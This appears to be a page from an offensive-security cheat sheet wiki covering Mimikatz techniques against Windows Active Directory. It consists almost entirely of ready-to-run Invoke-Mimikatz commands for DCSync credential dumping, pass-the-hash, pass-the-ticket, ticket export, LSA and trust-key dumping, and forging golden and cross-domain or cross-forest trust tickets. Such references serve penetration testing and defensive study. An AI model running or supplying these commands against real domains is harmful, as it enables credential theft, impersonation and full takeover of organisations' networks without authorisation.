🕺
CheatSheets
  • Introduction
  • Getting Started With Hacking
  • VMs on Mac
  • Windows
    • Enumeration
    • Local Privilege Escalation
    • UAC Bypasses
    • Persistance
    • Networking
  • Active Directory
    • Offensive Powershell
    • Enumeration
      • BloodHound
    • Lateral Movement
    • Escalation
      • ACL Abuse
      • Kerberoasting
      • Un-Constrained Delegation
      • JEA
    • Persistance
    • Mimikatz
    • Alternate Cred Dumps
    • MSSQL
    • Defences and Bypasses
    • Setting Up a Lab
  • Red Teaming
    • Phishing Payloads
    • Cobalt Strike
    • Metasploit
    • Sliver
  • Linux
    • Networking
    • Enumeration
    • Local Privilege Escalation
    • Persistance
    • MySQL
  • Mainframes
    • HP Nonstop
    • IBM z/OS
  • Cloud
    • AWS
    • GCP
    • Azure
  • Web App
    • Tomcat
    • SQLMap
    • PHP
  • Mobile
    • Android
    • iOS
  • Exploit-Dev
    • Linux
      • Basic Stack Overflows
      • Bypassing NX (DEP)
      • Bypassing ASLR
    • Shellcode
    • Windows
  • WiFi
    • Alfa AWUS036ACH Setup
    • Aircrack-ng
Powered by GitBook
On this page
  • DCSync
  • Pass-The-Ticket
  • Pass-The-Hash
  • Extract Tickets
  • Dump Local Creds
  • Extract Trust Keys
  • Forge Golden Ticket
  • Forge Inter-Domain Trust Ticket
  • Forge Inter-Forest Trust Ticket

Was this helpful?

  1. Active Directory

Mimikatz

DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\USER"'

Invoke-Mimikatz -Command '"lsadump::dcsync /all"'

# When DCsyncing and other actions you need to know the short hand of the domain.
# This can be found with Translate-Canonical
https://gist.github.com/HarmJ0y/4226349db644e6549605

Pass-The-Ticket

Invoke-Mimikatz -Command '"kerberos::ptt TGS_ticket_file.kirbi"'

Pass-The-Hash

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.local /ntlm:<ntlmhash> /run:powershell.exe"'

Extract Tickets

Invoke-Mimikatz -Command '"kerberos::list /export"'

Dump Local Creds

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Extract Trust Keys

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc 

Forge Golden Ticket

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:HASH id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Forge Inter-Domain Trust Ticket

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-15-21-280534878-1496970234-700767426-519 /rc4:HASH /service:krbtgt /target:TARGETDOMAIN.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"' 

Forge Inter-Forest Trust Ticket

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:HASH /service:krbtgt /target:TARGETFOREST.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'
PreviousPersistanceNextAlternate Cred Dumps

Last updated 4 years ago

Was this helpful?